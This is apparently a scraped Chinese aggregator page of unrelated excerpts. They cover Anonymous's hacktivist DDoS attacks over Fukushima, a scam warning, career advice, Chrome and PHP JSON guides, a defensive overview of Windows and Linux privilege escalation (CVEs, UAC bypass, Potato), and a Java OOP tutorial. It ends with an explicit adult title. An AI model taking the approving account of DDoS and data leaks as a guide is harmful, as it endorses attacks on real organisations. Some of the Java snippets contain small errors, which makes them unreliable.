教程打包 ...

日本核污水今日入海，这帮黑客怒了！ 自2011年东日本大地震以来，日本谋划已久的福岛核电站核污水排海计划已于8月24日下午起正式施行，预计排污周期长达30年，整个海洋及其生物都有可能遭受不可逆的毁灭性打击。据现场媒体报道，经过17分钟的流淌，核污染水经由1公里的海底隧道流进太平洋。据现场媒体报道，福岛附近海面已呈现出两种颜色。 2023 年 8 月 24 日上午，在福岛县浪江市拍摄的受损的福岛第一核电站（共同社）目前福岛第一核电站储存的核污染水约有134万吨，日本计划今年排放31200吨，分4次排放，每次约排放7800吨，整个排海工作预计持续30年，将影响整个太平洋乃至全球海域。我国对于这一行为表示坚决反对和强烈谴责。根据海关总署8月24日消息，为全面防范日本福岛核污水排海对食品安全造成的放射性污染风险，保护中国消费者健康，确保进口食品安全，海关总署决定自2023年8月24日（含）起全面暂停进口原产地为日本的水产品（含食用水生动物）。事实上，往大海排放核污水方案早在公布之初就遭到日本国内渔民和国际多个国家、科学与环保组织的反对，但日本政府仍然于8月24日执意排海。而在诸多的反对声音中，还出现了黑客组织的身影。近期，著名黑客组织Anonymous就对日本核电相关的组织发起了网络攻击，以抗议政府将福岛核电站处理后的放射性核废水排入大海。根据《日本时报》的消息，自7月国际原子能机构认定日本的这项排海计划符合安全标准后，Anonymous 就一直在加强针对日本核电部门的攻击，日本原子能研究开发机构、日本原子能发电公司、日本原子能学会均成为攻击对象。据日本原子能研发机构称，其网站遭受了超日常流量百倍的DDoS攻击，但通过采取措施并未造成无法浏览等影响。 据 NTT Security 报道，在日本政府于 2021 年正式决定向海洋排放受损核电站产生的废水后，Anonymous 就发布了一份攻击“目标清单”，将日本相关组织列入其中。除了上述的三个核电相关组织外，东京电力公司、经济产业省和自民党也榜上有名。 Anonymous有成员向媒体表示，日本政府排放经过处理的核废水政策缺乏透明度，公众没能参与其决策，必须制止为了经济利益而将海洋变成垃圾场的愚蠢行为。 这已不是Anonymous今年第一次向日本政府的行为表达不满，今年5月，Anonymous涉嫌攻击了日本司法部，以抗议日本政府的移民政府，导致其网站相关服务陆续中断了两次。有Anonymous成员还在推特上警告日本政府，要求他们保护难民而不是驱逐。 国际性黑客组织Anonymous Anonymous是一个庞大且松散的国际性黑客组织，其成员遍布在世界上的多个国家。原先是全球最大的黑客组织，也是全球最大的政治性黑客组织，主要分部于美国，其次为欧洲各国、非洲、南美洲、亚洲等地，对于一些政府颇具争议的政策和举措，各地成员时常以组织网络攻击的形式表达抗议。 针对伊朗发起OpIran运动   2022年9月，Anonymous宣布发起针对伊朗的OpIran运动，攻击了包括伊朗政府、情报机构和警方在内的网站。而事件起因则是一位名叫马哈萨·阿米尼的女性因佩戴头巾过于宽松而被伊朗道德警察逮捕，仅在3天后，阿米尼在重症监护室死亡。伊朗当局称她是在警察局因心脏衰竭自然死亡。但根据就医报告，伊朗人民认为阿米尼系被殴打致死，于是德黑兰街头爆发了大规模民众抗议，并在社交网络持续发酵。 为了控制舆情，伊朗方面关闭了部分国内的移动网络服务。随即，Anonymous在推特上宣称，“亲爱的伊朗，你屏蔽网络，我们就让你关门”。9月21日，匿名者攻击了伊朗法庭研究中心、伊朗议会和警方网站，并将窃取的数据泄露到网上；还将伊朗官方媒体法尔斯通讯社攻击下线。该组织呼吁对伊朗网站发起DDoS攻击，并窃取数据进行泄露，同时还倡导伊朗人使用Tor浏览器绕过国家审查。   在俄乌战争中攻击俄罗斯 在2022年2月24日俄乌战争爆发后不久，Anonymous就在twitter上正式对俄罗斯“宣战”，仅在几天之内就攻下300多家俄政府网站、国家媒体和银行网站，包括克里姆林宫、俄联邦委员会、俄罗斯杜马、俄罗斯外交部、红星电视台以及俄罗斯安全委员会等政府网站均遭到了网络攻击无法打开。 而在随后的3月，Anonymous又先后攻击了俄罗斯紧急情况部、俄罗斯国家核能公司、俄罗斯央行等机构网站，从中窃取了大量数据，并在暗网、推特等渠道进行泄露。可见，Anonymous主要是出于政治立场而非经济动机对俄罗斯发动密集的网络攻击。   黑客也有自己的态度   很明显，此次日本向大海排放核污水再次刺激到了这群黑客的神经，于是一场针对性的网络攻击就此产生。由此也表明日本这一行为是多么地令人感到震惊，核污水中的放射性物质会对环境造成极大的破坏。这些物质会通过水循环进入生态系统，影响生物的生存和繁衍。 期待更多人表达自己的态度，抵制日本向大海排放核污水。   新型骗局盯上了奶茶！已有人上当，聊天记录曝光； “老板，我校急需要一大批XXX” 如果你是商户老板 突然接到这样的大额订单 你会不会心动？   日前，重庆一奶茶店店主小刘遭新型“订单诈骗”，被骗3万元。   一男子自称要订购矿泉水、自热米饭和120杯奶茶。由于店内没有自热米饭，小刘又不想错失“大单”，便联系了其推荐“中间人”，并据此联系到一名所谓“厂家销售人员”拿货。在垫付3万元货款后，小刘被拉黑……目前，涉案账户已被民警成功止付、冻结，案件正在进一步侦办当中。而类似骗局不止一次 很多人都遇上过，近期也有不少人上当 近日四川省绵阳市三台县一奶茶店老板王女士接到一个陌生来电对方自称是“武警部队后勤采购部黄干事”想订购300杯奶茶 面对这样的“大生意”王女士心动不已加上她本身对军人非常尊敬毫不犹豫便“接单”了添加好友后，“黄干事”表示需要订购300杯奶茶6月14日他们到三台县开会时派人到店取货 随后“黄干事”发来一份“采购清单”“水果奶茶150杯，珍珠奶茶150杯”署名为“中国人民武装警察部队后勤采购部” 王女士看见采购单上盖了“中国人民武装警察部队后勤专用章”更是深信不疑立即按照要求列了一个报价单“黄干事”看后表示他将“给领导审核”后再联系她6月13日“黄干事”给王女士打来电话表示“领导审核通过了”但他们还需要采购30件矿泉水以及60件罐头为了便于一次性取货希望王女士能帮忙“代购” 这种指定的红烧牛肉罐头不好买但“黄干事”很是“热情”给王女士提供了“供应商王经理”的联系方式 王女士与“王经理”进行了联系“王经理”表示货源充足当天下午就可以送货保证买家6月14日能取到货不过“王经理”声称这种罐头要600元一件由于采购量大他没有这么多钱购货需要先付钱再送货 王女士担心给了钱对方不发货便让“王经理”提供地址准备请其当地朋友当面付款取货“王经理”见王女士不好糊弄，又谎称“我们分仓只是负责运输调配货不销售产品都是厂家统一安排分仓备货配送”王女士见“王经理”说话前后矛盾便怀疑自己遭到了诈骗于是立即停止与其联系上网查询相关信息果然查到了类似的骗局 后来王女士将一个警示视频发给“王经理”没想到被“王经理”拉黑了......王女士便立即报警大额盒饭订单背后隐藏着电诈骗局 重要提示 采购物资会进行严格的审查，绝不可能通过电话、短信通知或要求代购。 遇到此类大单时，首先要核实对方身份，也要核实供应商的身份，看是否正规；对于要先付“订金”“货款”等要求，要仔细甄别，若发现异常，请立即终止交易。 切勿贪图小便宜，切勿随意汇款转账至陌生账户，一旦发现被骗，请立刻报警。  ...

在体制内工作相对在企业工作，更稳定、更有保障，确实是不错的选择，但也有很多不好的地方，且不是所有人都能考进体制内，不是所有人都适合体制内。 就在短短十多年前，那时候大学生稀缺、经济也高速增长，社会上有很多高收入福利好又体面有稳定的工作机会。考公考编确实算不上985 211本科生研究生的最佳选择，只能算退路，原来才有“实在不行就去考公考编吧”的说法。 然而，现在不一样了，受过高等教育的人激增，且大家在教育上投入的时间和经济成本很高，对就业的预期也很高。 但是，就业市场中的优质工作机会却没有如高校毕业生增长的速度一样激增，高等教育的人才供大于求，而好点的就业岗位都已经饱和了，那些收入高稳定福利好的，体面地位高的工作，往往就像HIV一样只通过那几种途径传播。 另外，这几年由于国内国外大环境影响，类似于互联网、传统制造业等行业都开始从红利期退出，企业规模和利润下降，能吸纳的自然就业人数下降，能提供的薪资福利待遇也相应下降，特别是中小企业创业经营很困难，在中小企业工作，更没有保障，收入和福利不一定好，薪资福利保障不完善，工作压力还大，竞争内卷严重，工作收入不稳定、很容易被优化毕业。 所以，相比之下，如果能进入体制内、国企和大厂，虽然也有各种各样的问题，但福利、薪资、稳定性等是相对中小企业更有保障的，如今考公考编可能当代普通家庭的大学生们最好的出路之一了，所以大家才拼命去卷去挤。 在这样的情况下，大量985 211、甚至顶级名校海归硕博和清北复交名校硕博，都开始蜂拥去卷考公考编了，一些很差很偏远的岗位都有人抢，真的卷的不行，不是谁想考上就能考上的了。 假如考公考编进国企上岸了，那肯定是值得庆祝的，毕竟未来有了一些保障，变得稳定一些了;但没有考上的朋友，也不必过于焦虑，条条大路通罗马，总有一条道路属于自己。 体制内虽然有其优点，但各种不好的地方也是存在的，不是所有人都适合考公考编，不是所有人都考得上，也不是所有人都适合体制内，一定要结合自己的实际情况考虑之后再做决定，关键要看自己合不合适，不然可能会非常痛苦，白白浪费自己的宝贵青春。 如果要考公考编的话，刚毕业、还年轻或家里有条件，可以选择脱产全职备考，但不要超过一年，不然那种脱产不工作考好几年的情况，容易对自己的职业生涯会有很大影响，最好在职考。 如果考了好几年、很多次都没考上，就说明你真的不适合吃这碗饭，赶紧转换方向转换赛道，不要一条路走到黑，切莫浪费自己的宝贵青春年华，让沉没成本和机会成本越来越高。 @耿向顺的微博...

Google Chrome是一款由Google公司开发的网页浏览器，无论是稳定性、速度、安全性，都是它的优点，我们在工作中使用谷歌Chrome能大大的提高我们的工作效率。对于有些用户不知道怎么下载谷歌Chrome！下面小编就详细的给大家介绍谷歌Chrome下载安装方法。   谷歌Chrome浏览器怎么下载安装？ 第一步：我们在浏览器地址栏输入下载地址：https://www.google.cn/chrome/，或是在百度搜索框中输入关键字“chrome”，现在会出来很多，我们需要找到Google官方官网，打开它；   第二步：进入官网后，点击“下载Chrome”按钮；   如果您下载以后找不到了，可以点击右上角的三个带你找到下载。要是没有下载，进行手动下载chrome链接。   第三步：此时双击打开文件，然后等待安装，要是中间有弹出窗口，点击“运行”或是“是”、“允许安装”，一律同意就行。   谷歌Chrome浏览器优点 1、Chrome启动速度快、浏览器速度快、界面简单； 2、内置原装网页翻译，方便大家浏览器外文网站，所有插件的按钮都出现在上方，反应快，网银要是不兼容可以装个ietab就可以。 3、同步功能，专为Chrome提供的服务，无论我们是在手机端还是电脑端，都是可以同步的，非常的方便。 4、书签，书签在地址栏的下方，想要收藏的网站，直接收藏，下载想要再次访问时，直接点击打开即可访问，超级的方便。 5、更新速度快，谷歌Chrome更新速度非常快，各种新功能才能尽快的推出、各种bug才能迅速修复。有了快捷更新，对于网页新的技术也能尽快支持。 总结：以上就是谷歌Chrome下载安装的方法，如果您也想要使用谷歌Chrome，那么按照以上的方法进行操作即可，小编使用习惯了谷歌浏览器，就不再想用其他的浏览器啦！确实非常的好用。...

JSON是一种轻量级的数据交换格式，常用于前后端数据的传输和存储。JSON由键值对组成，其中键必须是字符串，值可以是字符串、数字、布尔值、数组、对象或null。在编程中，我们经常需要将JSON格式的数据转换为程序可用的数据类型，称为解码或反序列化操作。在PHP中，可以使用json_decode()函数进行这个操作。 例如，我们有以下JSON字符串： ``` $json_str = '{"name":"Tom","age":18,"is_student":true}'; ``` 我们可以使用json_decode()函数将它转换为PHP对象或关联数组，如下所示： ``` $php_obj = json_decode($json_str); // 返回一个stdClass对象 $php_arr = json_decode($json_str, true); // 返回一个关联数组 ``` 注意，第二个参数为true时，json_decode()函数将返回关联数组，否则返回stdClass对象。如果JSON字符串无效，json_decode()函数将返回null。   而在编程中我们也经常需要将数据转换为JSON格式进行传输和存储。在PHP中，可以使用json_encode()函数将PHP对象或数组转换为JSON字符串。 例如，我们有以下PHP数组： ``` $person = array("name" => "Tom", "age" => 18, "is_student" => true); ``` 我们可以使用json_encode()函数将它转换为JSON字符串，如下所示： ``` $json_str = json_encode($person); // 返回 '{"name":"Tom","age":18,"is_student":true}' ``` 注意，json_encode()函数可以接受多个参数，其中第二个参数指定是否格式化输出，第三个参数指定JSON中字符串的引号风格，第四个参数指定JSON编码的深度等。有关更多详细信息，请参阅PHP文档。...

前言 在网络攻防演练实战中，权限提升技战法扮演着关键的角色。权限提升是攻击者在系统或网络中升级自身权限的关键技术，承接了攻击者获取初始访问权限的努力，并为之后的攻击行动铺平道路。高权限使攻击者能够突破初始的访问限制，进而实现更深入、更具破坏性的攻击。 在演练中，蓝军（攻击方）可能会利用各种技术手段进行权限提升攻击，突破初始的限制，进一步渗透目标网络，获取更敏感的信息、控制更多的系统资源，或者对目标进行更深入的操纵和破坏。红军（防守方）面临着蓝军利用各种技术手段试图提升权限的挑战。 攻防演练中本地权限提升攻击的“五大危害”： 系统安全降级：通过权限提升手段，攻击者可以将受害者的权限从普通用户提升为管理员，这会导致系统的安全性大幅降低。一旦攻击者获得管理员权限，他们可以安装恶意软件、修改系统设置、删除重要文件，甚至完全控制受害者的计算机。 恶意软件安装：许多恶意软件需要管理员权限才能成功感染系统，因此它们借助各类权限提升手段欺骗用户，使其在不知情的情况下安装恶意软件。这可能包括间谍软件、勒索软件、广告软件和其他类型的恶意程序。 敏感数据泄露：绕过安全限制，访问用户的敏感数据。这些数据可能包括个人身份信息、登录凭据、金融信息等。一旦数据泄露，用户可能会面临身份盗用和其他严重后果。 系统文件篡改：修改系统文件、注册表项和配置设置，导致系统不稳定或无法正常运行。这可能导致系统崩溃、蓝屏等问题，严重影响用户的正常使用。 后门隐匿安装：可以被恶意软件利用来安装后门程序，为攻击者提供长期访问和控制的机会。这使得攻击者可以持续监视和操纵受害者的计算机，而不被察觉。 为了应对攻防演练实战的考验，防守方需要理解和掌握权限提升技战法，搭配相关产品与相应的防御措施，以有效保护关键靶标免受攻击。本文总结了攻防演练中高频使用的权限提升方式及应对之策，帮助防守方增加对攻击者行为的了解，更好地应对和防范权限提升攻击。 攻防演练高频本地权限提升高频技战法 在攻防演练的后渗透阶段中，用于实现权限提升的方案里使用频率最高的有漏洞利用、UAC Bypass、Potato等： 1.本地权限提升类漏洞 在获取目标初始访问权限后，通过权限提升漏洞扩大攻击能力，或将权限提升漏洞直接附加在木马武器中进行投递。在Windows操作系统中，出现漏洞的组件既有Win32k、Print Spooler这种漏洞“重灾区”，也有近两年频繁出现漏洞的内核组件CLFS通用日志文件系统。Windows作为最为常见的PC操作系统，其上的高可利用提权漏洞带来的危害不言而喻，而Linux在生产环境、服务器等场景下也占有不少的应用，一旦遭受漏洞攻击，会给用户的生产生活带来严重的损失。 在Windows操作系统中，打印机服务（Print Spooler）漏洞应用范围广，稳定性强，同时具有强危害性，例如名为PrintNightmare的CVE-2021-1675/CVE-2021-34527漏洞，在域环境中合适的条件下，无需任何用户交互，未经身份验证的远程攻击者就可以利用该漏洞以SYSTEM权限在域控制器上执行任意代码。此外，近期爆出的在野利用漏洞同样值得关注，例如Windows CLFS权限提升漏洞CVE-2023-28252，由于其很高的可利用性，可能会被攻击者继续利用。 在Linux操作系统方面，CVE-2021-3156 sudo提权漏洞从被公开便被认为是一个非常严重的漏洞，它影响了Linux和Unix系统上的sudo命令，允许未经授权的用户在系统上获得root权限。 2.UAC Bypass用户端权限提升方案 Microsoft的Windows Vista和Windows Server2008操作系统引入了一种良好的用户帐户控制架构，它是Windows的一个安全功能，防止对操作系统进行未经授权的修改。UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前，拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证，以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。如果管理员不允许更改，则更改不会执行。 Uac Bypass是指攻击者绕过UAC机制的弹窗通知，在不提示用户的情况下达到执行高权限操作的攻击技法。当程序出现提升权限的请求时，AIS服务将校验其是否满足权限提升的条件。满足一定条件的程序将不需要弹出UAC对话框自动提升为管理员。例如，使用Rundll32加载特制的DLL，该DLL加载自动提升的组件对象模型对象，并在通常需要提升访问权限的受保护目录中执行文件操作。恶意软件也可能被注入到受信任的进程中，以获得提升的权限，而无需提示用户。 常见的UAC Bypass方式有劫持特定的注册表项、绕过AIS对可信目录的检查逻辑、滥用Windows AutoElevate等，UACME开源项目中列举的很多已知的UAC Bypass方案，说明UAC仍存在较大的暴露面，需要在演练前进行针对性的封锁。 3.Potato服务端权限提升方案 服务账户身份在Windows权限模型中本身就具有很高的权限，部分服务进程具备可模拟客户端的SelmpersonatePrivilege进程权限。Potato提权的原理基于Windows操作系统中的一个可滥用的安全机制，该机制存在于Windows的管道（pipe）服务中。通过特殊方式构造SYSTEM身份向恶意服务端的连接，即可借助特殊权限模拟SYSTEM进程身份，实现Potato提权。 Potato相关技术在武器化实战过程中一直演进、成熟。在演练中，一旦从外部突破到服务器，攻击者往往选择利用Potato攻击技术从服务账户提升到SYSTEM权限，进行后续权限维持等攻击操作，造成严重后果。且在服务器场景下可能存在部分防御薄弱、账户权限较高的特殊性，Potato提权方式在演练中一直有比较亮眼的发挥。 综上，在攻防演练前，防守方有必要对己方资产中相关漏洞、防护缺口进行排查，提高演练过程中对相关行为的检测能力，避免防守失分。一旦高权限被攻击者获取，攻击者能够展开更深层次的渗透攻击。 企业用户如何应对本地权限提升威胁 除了及时更新系统、实施最小权原则以外，需要对已知的本地提权漏洞、UAC Bypass方案以及Potato提权方式进行及时的研究与封锁。更进一步，在防护端对权限提升本身进程权限发生变化的行为进行监控，实现对权限提升类行为的防控。绿盟一体化终端安全管理系统（UES）已集成对进程权限异常变化的检测，提供权限提升威胁发现与告警能力，保障终端安全。 ...

文章目录 1. 什么是OOP或面向对象编程？ 1.1. 类和对象 1.2. 构造函数 2. OOP 的 4 个特性 2.1. 抽象 2.1.1. 数据抽象 2.1.2. 控制抽象 2.2. 封装 2.2.1. 信息隐藏 2.2.2. 实施隐藏 2.3. 继承 2.3.1. 继承示例 2.3.2. 继承的类型 2.4. 多态性 2.4.1. 编译时多态性 2.4.2. 运行时多态性 3.更多面向对象编程概念 3.1. 耦合度 3.2. 内聚度 3.3. 关联 3.4. 聚合 3.5. 组合 4.最佳实践 4.1. 优先考虑组合而不是继承 4.2. 面向接口编程，而不是具体实现 4.3. DRY（不要重复自己） 4.4. 封装变化 4.5. 单一职责原则 4.6. 开闭原则 5. 总结 面向对象编程（OOP）是指基于对象的编程方法，而不是像函数式编程那样仅基于函数和过程。这些对象可以包含数据（属性）和方法（行为），就像我们在应用程序中建模的现实生活实体一样。 本教程将教我们四个主要特性——抽象、封装、继承和多态性。这些也被称为面向对象编程范式的四大特性。 1. 什么是OOP或面向对象编程？ 早期，人们用二进制代码编写程序，并使用机械开关来加载程序。后来，随着硬件功能的发展，专家尝试使用高级语言来简化编程，我们使用编译器从程序生成机器指令。 随着更多的发展，专家们创建了基于小函数的结构化编程。这些函数在很多方面都有帮助，例如代码重用、局部变量、代码调试和代码可维护性。 随着计算的进步和对更复杂应用程序的需求，结构化编程的局限性开始显现出来。复杂的应用程序需要与现实世界和用例更紧密地建模。 后来，专家们开发了面向对象编程。在 OOP 的中心，我们有对象和类。就像现实生活中的实体一样，对象具有两个重要特征： 数据– 讲述属性和对象的状态 行为– 赋予其改变自身并与其他对象进行通信的能力 1.1. 类和对象 对象是类的实例。每个对象都有自己的状态、行为和身份。类是其对象的蓝图或模板。 对象可以通过调用函数与其他对象进行通信。它有时被称为消息传递。 例如，如果我们正在开发人力资源应用程序，那么它由实体/参与者组成，例如员工、经理、部门、工资单、假期、目标、时间跟踪等。为了在计算机程序中对这些实体进行建模，我们可以创建具有类似属性的类现实生活中的数据属性和行为。 例如，员工实体可以表示为Employee类： public class Employee { private long id; private String title; private String firstName; private String middleName; private String lastName; private Date dateOfBirth; private Address mailingAddress; private Address permanentAddress; // 根据应用程序的要求，可以添加更多类似的属性、getter和setter方法。 }   以上Employee作为模板。我们可以使用此类在应用程序中创建所需数量的不同员工对象。 Employee e = new Employee(111); e.setFirstName("Alex"); .. .. int age = e.getAge();   该id字段有助于存储和检索任何单个员工的详细信息。 对象标识通常由应用程序运行时环境维护，例如，用于Java应用程序的Java虚拟机(JVM)。每次我们创建一个 Java 对象时，JVM 都会为该对象创建一个哈希码并分配它。这样，即使程序员忘记添加id字段，JVM 也能确保所有对象都是唯一标识的。 1.2. 构造函数 构造函数是没有任何返回值的特殊方法。它们的名称始终与类的名称相同，但它们可以接受参数，这些参数有助于在应用程序开始使用对象之前设置对象的初始状态。 如果我们不提供任何构造函数，JVM 会为该类分配一个默认构造函数。此默认构造函数不接受任何参数，即无参构造。 请记住，如果我们为任何类分配构造函数，那么 JVM 不会为其分配默认构造函数。如果需要，我们需要向类显式指定默认构造函数。 public class Employee { // 默认构造 public Employee() { } // 自定义构造 public Employee(int id) { this.id = id; } }   2. OOP 的 4 个特性 面向对象编程的四大特点是： 抽象 封装 继承 多态 2.1. 抽象 当我们将抽象与实时示例联系起来时，它就很容易理解。例如，当我们驾驶汽车时，我们不必关心汽车的确切内部工作原理。我们关心的是通过方向盘、制动踏板、油门踏板等接口与汽车进行交互。在这里，我们对汽车的了解是抽象的。 在计算机科学中，抽象是用形式与其含义（语义）相似的表示来定义数据和程序，同时隐藏实现细节的过程。 简而言之，抽象隐藏了与上下文无关的信息，或者只显示相关信息，并通过将其与现实世界中的类似信息进行比较来简化它。 通常抽象可以通过两种方式来看待： 2.1.1. 数据抽象 数据抽象是从多个较小的数据类型创建复杂数据类型的方法，这更接近现实生活中的实体。例如， Employee 类可以是具有各种小关联的复杂对象。 public class Employee { private Department department; private Address address; private Education education; //So on... } 因此，如果您想获取有关员工的信息，您可以从 Employee 对象中询问 – 就像在现实生活中一样，询问该人本人。 2.1.2. 控制抽象 控制抽象是通过隐藏复杂任务的操作序列（在简单的方法调用内）来实现的，因此执行任务的逻辑可以对客户端隐藏，并且可以在不影响客户端代码的情况下进行更改。 public class EmployeeManager { public Address getPrefferedAddress(Employee e) { //从数据库获取所有地址 //在这里实现获取所有地址的逻辑 //返回一个包含所有地址的列表 } } 在上面的例子中，明天如果你想改变逻辑，让每次国内地址始终是首选地址，你就改变getPrefferedAddress()方法内部的逻辑，  客户端将不受影响。 2.2. 封装 将数据和方法包装在类中并与实现隐藏（通过访问控制）相结合通常称为封装。结果是具有特征和行为的数据类型。 “无论发生何种变化，都要将其封装起来” – 一条著名的设计原则。 封装本质上既有信息隐藏，也有实现隐藏。 信息隐藏是通过使用访问控制修饰符（public、private、protected）来完成的，实现隐藏是通过为类创建接口来实现的。 实现隐藏允许设计者修改对象履行职责的方式。当设计（甚至需求）可能发生变化时，这一点尤其有价值。 让我们举一个例子来更清楚地说明这一点。 2.2.1. 信息隐藏 class InformationHiding { //限制直接访问内部数据 private ArrayList items = new ArrayList(); //提供一种访问数据的方式 - 内部逻辑可以在将来安全地进行更改 public ArrayList getItems(){ return items; } }   2.2.2. 实施隐藏 interface ImplemenatationHiding { Integer sumAllItems(ArrayList items); } class InformationHiding implements ImplemenatationHiding{//限制直接访问内部数据private ArrayList items = new ArrayList(); //提供一种访问数据的方式 - 内部逻辑可以在将来安全地进行更改 public ArrayList getItems(){ return items; } public Integer sumAllItems(ArrayList items) { // 在这里，您可以按任何顺序执行N项操作 // 这些操作您不希望客户端知道 // 您可以更改顺序甚至整个逻辑 // 而不会影响客户端。 } }   2.3. 继承 继承是面向对象编程中的另一个重要概念。继承是一个类获取父类的属性和行为的一种机制。它本质上是在类之间创建父子关系。在Java中，我们使用继承主要是为了代码的可重用性和可维护性。 Java 中的关键字“ extends ”用于继承类。“ extends”关键字表示我们正在创建一个派生自现有类的新类。 在Java术语中，被继承的类称为超类。新类称为子类。 子类从其超类继承所有非私有成员（字段、方法和嵌套类）。构造函数不是成员，因此不能被子类继承，但可以从子类调用超类的构造函数。 2.3.1. 继承示例 public class Employee { private Department department; private Address address; private Education education; //So on... } public class Manager extends Employee { private List<Employee> reportees;}   在上面的代码中，Manager 是 Employee 的特殊版本，重用Employee类中的部门、地址和教育，并定义了自己的reportees列表。 2.3.2. 继承的类型 单继承——子类派生自一个父类。 class Parent { //code } class Child extends Parent { //code}   多重继承——一个孩子可以从多个父母那里继承。在 JDK 1.7 之前，通过使用类在 java 中无法实现多重继承。但从 JDK 1.8 开始，通过使用带有默认方法的接口可以实现多重继承。 interface MyInterface1 { } interface MyInterface2 { } class MyClass implements MyInterface1, MyInterface2 { }   多级继承——指三个以上的类之间的继承，其中一个子类将充当另一个子类的父类。 class A { } class B extends A { } class C extends B { }   层次继承是指有一个超类和多个扩展超类的子类时的继承。 class A { } class B extends A { } class C extends A { } class D extends A { }   混合继承——是两种或多种继承类型的组合。因此，当类之间的关系包含两种或多种类型的继承时，我们就说类实现了混合继承。 interface A { } interface B extends A { } class C implements A { } class D extends C impements B { }   2.4. 多态性 多态性是一种能力，通过它，我们可以创建在不同的编程上下文中表现不同的函数或引用变量。它通常被称为具有多种形式的一个名称。 例如，在大多数编程语言中， '+' 运算符用于添加两个数字和连接两个字符串。根据变量的类型，运算符会更改其行为。这称为运算符重载。 在Java中，多态本质上分为两种： 2.4.1. 编译时多态性 在编译时多态性中，编译器可以在编译时将适当的方法绑定到相应的对象，因为它拥有所有必要的信息并且知道在程序编译期间调用哪个方法。 它通常被称为静态绑定或早期绑定。 在Java中，它是通过使用方法重载来实现的。在方法重载中，方法参数可以随参数的数量、顺序或类型而变化。 class PlusOperator { int sum(int x, int y) { return x + y; } double sum(double x, double y) { return x + y; } String sum(String s1, String s2) { return s1.concat(s2); } }   2.4.2. 运行时多态性 在运行时多态性中，对重写方法的调用在运行时动态解析。将在其上执行方法的对象是在运行时确定的——通常取决于用户驱动的上下文。 它通常被称为动态绑定或方法重写。我们可能听说过动态方法调度这个名字。 在运行时多态性中，我们通常有一个父类和至少一个子类。在类中，我们编写一条语句来执行父类和子类中存在的方法。 使用父类类型的变量给出方法调用。类的实际实例是在运行时确定的，因为父类类型变量也可以存储对父类以及子类实例的引用。 class Animal { public void sound() { System.out.println("Some sound"); } } class Lion extends Animal {public void sound() {System.out.println("Roar");}} class Main {public static void main(String[] args) { //Parent class reference is pointing to a parent object Animal animal = new Animal(); animal.sound(); //Some sound //Parent class reference is pointing to a child object Animal animal = new Lion(); animal.sound(); //Roar }}   3.更多面向对象编程概念 除了上述的四个面向对象编程构建基块之外，还有一些其他概念在构建整体理解方面起着重要作用。 在深入探讨之前，我们需要了解术语“模块”。在一般的编程中，模块是执行独特功能的类或子应用程序。在人力资源应用程序中，一个类可以执行诸如发送电子邮件、生成工资单、计算员工年龄等各种功能。 3.1. 耦合度 耦合度是模块之间相互依赖程度的度量。耦合度指的是软件元素与其他元素之间的联系强度。良好的软件将具有低耦合度。 这意味着一个类应该执行唯一的任务，或者只执行与其他任务无关的任务。例如，一个EmailValidator类只会验证电子邮件。同样，EmailSender类只会发送电子邮件。 如果我们将这两个功能都包含在一个名为EmailUtils的单个类中，那么这就是紧密耦合的示例。 3.2. 内聚度 内聚度是保持模块整体性的内在因素。良好的软件设计将具有高内聚度。 这意味着一个类/模块应该包含执行其功能所需的所有信息，而不依赖于其他内容。例如，一个EmailSender类应该能够配置SMTP服务器，并接受发件人的电子邮件、主题和内容。基本上，它应该只关注发送电子邮件。 应用程序不应该将EmailSender用于发送电子邮件以外的任何其他功能。低内聚度会导致庞大的类，难以维护、理解和降低可重用性。 3.3. 关联 关联指的是具有独立生命周期且彼此没有所有权的对象之间的关系。 以教师和学生为例。多个学生可以与单个教师关联，单个学生也可以与多个教师关联，但它们都有自己的生命周期。 两者都可以独立创建和删除，因此当教师离开学校时，我们不需要删除任何学生，当学生离开学校时，我们也不需要删除任何教师。 3.4. 聚合 聚合指的是具有独立生命周期但具有“拥有关系”的对象之间的关系。它发生在子类和父类之间，其中子对象不能属于另一个父对象。 以手机和手机电池为例。一块电池一次只能属于一个手机。如果手机停止工作，我们从数据库中删除它，手机电池将不会被删除，因为它可能仍然可用。因此，在聚合中，虽然存在所有权，但对象有自己的生命周期。 3.5. 组合 组合指的是对象没有独立生命周期的关系。如果删除父对象，所有子对象都将被删除。 例如，问题和答案之间的关系。一个问题可以有多个答案，但答案不能属于多个问题。如果我们删除一个问题，它的所有答案将自动被删除。 4.最佳实践 4.1. 优先考虑组合而不是继承 继承和组合都促进了代码的可重用性。但在继承与组合之间，更倾向于使用组合。 组合的实现通常从创建各种表示系统必须展现的行为的接口开始。接口使得多态行为成为可能。实现已确定接口的类会根据需要构建并添加到业务领域类中。因此，系统行为可以在没有继承的情况下实现。 interface Printable { print(); } interface Convertible { print(); } class HtmlReport implements Printable, Convertible { } class PdfReport implements Printable { } class XmlReport implements Convertible { } 4.2. 面向接口编程，而不是具体实现 这会导致灵活的代码，可以与接口的任何新实现一起使用。我们应该将接口用作变量、方法的返回类型或方法的参数类型。 接口充当超类类型。通过这种方式，我们可以在不修改现有代码的情况下，在将来创建更多接口的特定实现。 4.3. DRY（不要重复自己） 不要编写重复的代码，而是使用抽象将常见的内容抽象到一个地方。 作为一个基本原则，如果在两个地方写了相同的代码 – 考虑将其提取到一个单独的函数中，并在两个地方调用该函数。 4.4. 封装变化 所有软件都会随着时间的推移而发生变化。因此，将您期望或怀疑将来会发生变化的代码封装起来。 在Java中，使用私有方法来隐藏此类实现，以使客户端不必在进行更改时更改其代码。 还建议使用设计模式来实现封装。例如，工厂设计模式封装了对象创建代码，并提供了灵活性，以后可以引入新类型，而不会影响现有客户端。 4.5. 单一职责原则 这是面向对象编程类设计的SOLID原则之一。它强调一个类应该只有一个责任。 换句话说，我们应该为一个目的编写、更改和维护一个类。这将使我们能够在不担心更改对另一个实体产生影响的情况下进行未来更改。 4.6. 开闭原则 它强调软件组件应该对扩展开放，但对修改关闭。 这意味着我们的类应该设计得当，以便其他开发人员在应用程序中的特定条件下更改控制流时，他们只需要扩展我们的类并重写一些函数，就可以了。 如果其他开发人员由于我们的类所施加的约束而无法设计所需的行为，那么我们应该重新考虑更改我们的类。 在整个面向对象编程范 Paradigm 内还有许多其他概念和定义，我们将在其他教程中学习。 5. 总结 这个Java面向对象编程（OOP）教程讨论了Java中的四个主要OOP特性，附有易于理解的程序和片段。您可以在评论部分提出您的问题。   ...

-兔美醬-#听说白丝微胖才是极品  4p ...

